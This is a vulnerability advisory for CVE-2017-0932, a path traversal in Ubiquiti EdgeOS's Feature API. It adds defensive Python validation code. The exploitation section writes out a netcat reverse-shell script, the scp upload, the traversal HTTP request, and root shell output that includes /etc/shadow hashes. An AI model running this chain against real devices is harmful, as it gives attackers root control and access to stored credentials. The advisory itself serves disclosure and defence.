In UBNT EdgeOS version 1.9.1.1 and prior, as a consequence of missing input validation in the Feature functionality, an attacker with access to an operator (read-only) account and an SSH connection to the device can escalate privileges to admin (root) access on the system.

  • Vendor: Ubiquiti Networks
  • Device: EdgeRouter X
  • Affected Version: 1.9.1.1 and prior
  • CVE-ID: CVE-2017-0932

Details

EdgeOS (firmware v1.9.1.1) is susceptible to a local privilege escalation due to a Path Traversal vulnerability in the Feature API. This vulnerability allows an attacker with non-privileged (read-only) access to execute commands on the device with root rights. The attack consists of sending a maliciously crafted file to the device (using scp with a non-privileged account) and then calling the vulnerable API with a path traversal payload. The exploitation results in the crafted file being executed with root permissions, giving the attacker full access to the device.
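The root cause described above is that the user-controlled `scenario` value is joined into a filesystem path and the resulting directory is executed as root without any check that it still lies under the intended feature directory. The following is an added example, not EdgeOS code (the vendor's implementation is not shown in this advisory), of how a server-side handler can reject such a value with two independent layers: a strict allowlist on the scenario name, and a containment check on the canonical path so that a symlink placed inside the feature directory cannot point outside it. The directory names (`features`, `pppoe`) and the fixture are constructed for the demonstration.

```python
import os
import re
import tempfile

# Layer 1: a scenario is a plain name. No separators, no dots, bounded length.
SCENARIO_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


class InvalidScenario(ValueError):
    """Raised when the requested scenario is rejected."""


def resolve_scenario(base_dir: str, scenario: str) -> str:
    """Map the user-supplied 'scenario' value onto a directory under base_dir.

    Returns the canonical directory path, or raises InvalidScenario.
    """
    if not SCENARIO_NAME.fullmatch(scenario):
        raise InvalidScenario(f"scenario name rejected by allowlist: {scenario!r}")

    # Layer 2: canonicalise both sides and require the candidate to stay under
    # base_dir. commonpath() avoids the "/opt/feat" vs "/opt/feat-evil" prefix
    # pitfall that a plain startswith() check would have.
    base_real = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base_real, scenario))
    if os.path.commonpath([base_real, candidate]) != base_real:
        raise InvalidScenario(f"scenario resolves outside {base_real}: {candidate}")
    if not os.path.isdir(candidate):
        raise InvalidScenario(f"no such scenario: {scenario!r}")
    return candidate


def is_accepted(base_dir: str, scenario: str) -> bool:
    """True if resolve_scenario() would run this scenario, False if rejected."""
    try:
        resolve_scenario(base_dir, scenario)
        return True
    except InvalidScenario:
        return False


def demo() -> dict:
    """Constructed fixture: a temporary 'features' directory holding one
    legitimate scenario ('pppoe') plus a symlink that escapes the directory.
    Returns a mapping of requested scenario -> accepted?"""
    root = tempfile.mkdtemp()
    features = os.path.join(root, "features")
    os.makedirs(os.path.join(features, "pppoe"))
    outside = os.path.join(root, "home", "operator", "Backdoor")
    os.makedirs(outside)
    # A name that passes the allowlist but whose target lies outside features/.
    os.symlink(outside, os.path.join(features, "link"))

    requests = [
        "pppoe",                                    # legitimate
        "../../../../../home/operator/Backdoor",    # the traversal from the advisory
        "link",                                     # symlink escape, caught by layer 2
        "pppoe/../pppoe",                           # separator in name, caught by layer 1
        "",                                         # empty name
    ]
    return {name: is_accepted(features, name) for name in requests}


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{'accept' if ok else 'reject'}  {name!r}")
```

The allowlist alone would already stop the payload shown later in this advisory; the realpath containment check is what also stops a scenario name that is syntactically clean but has been turned into a symlink or otherwise resolves elsewhere.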

Exploitation

First of all, we have to create the following directory and file:

$ cat Backdoor/wizard-run
#!/bin/bash
/usr/bin/nc 192.168.2.2:1337 -e /bin/bash &

Using the non-privileged ‘operator’ user, it was possible to upload the file to the device with the scp command:

$ scp -r Backdoor operator@192.168.2.1:~
Welcome to EdgeOS

By logging in, accessing, or using the Ubiquiti product, you
acknowledge that you have read and understood the Ubiquiti
License Agreement (available in the Web UI at, by default,
http://192.168.1.1) and agree to be bound by its terms.

operator@192.168.2.1's password: 
wizard-run       

After that, using a valid operator session and the path traversal vulnerability, it was possible to have the uploaded file executed with root privileges:

POST /api/edge/feature.json HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Referer: https://192.168.2.1/
Content-Type: application/json
X-CSRF-TOKEN: 4310724fdcab5474ab225a105bd6f86d43247dbaf5b7f4aa2ec329a641ec55ec
X-Requested-With: XMLHttpRequest
Content-Length: 90
Cookie: ip_address_top_user_option=total_bytes; PHPSESSID=i6um09hej0ku2k5ctcp6ib56f1nrqhi7; X-CSRF-TOKEN=4310724fdcab5474ab225a105bd6f86d43247dbaf5b7f4aa2ec329a641ec55ec
Connection: close

{"data":{"scenario":"../../../../../home/operator/Backdoor","action":"load"}}

A remote shell is then established:

$ nc -lvp 1337
Listening on [0.0.0.0] (family 0, port 1337)
Connection from 192.168.2.1 44440 received!
id
uid=0(root) gid=102(vyattacfg)
uname -a
Linux ubnt 3.10.14-UBNT #1 SMP Sat Apr 22 06:38:07 PDT 2017 mips GNU/Linux
cat /etc/shadow
root:!:17283:0:99999:7:::
daemon:*:17283:0:99999:7:::
bin:*:17283:0:99999:7:::
games:*:17283:0:99999:7:::
.. snip snip ..
avahi:*:17283:0:99999:7:::
sshd:*:17283:0:99999:7:::
tss:*:17283:0:99999:7:::
ubnt:$1$zKNoUbAo$gomzUbYvgyUMcD436Wo66.:16436:0:99999:7:::
operator:$6$7SVNi.WB68V0QR5t$efMoCyT2H.mEU6M8s2NDSsW1fv7JnT2eAfK2VxuzsIdcYrEvWCILX8G0CYN/4enwrnT1yYjekQa95TxxHxhVj.:16436:0:99999:7:::

Recommendation

Upgrade the firmware to the latest available version.

Timeline

  • 2017-06-14 - Vulnerability discovered and first report to Ubiquiti Networks
  • 2017-06-14 - UBNT answered and confirmed the vulnerability
  • 2017-06-14 - Ubiquiti Networks rewarded with a $1,500 bounty
  • 2017-08-30 - Ubiquiti Networks fixed the vulnerability
  • 2017-11-24 - Ubiquiti Networks agreed with a partial disclosure of the vulnerability
  • 2018-03-05 - Disclosure of technical details

References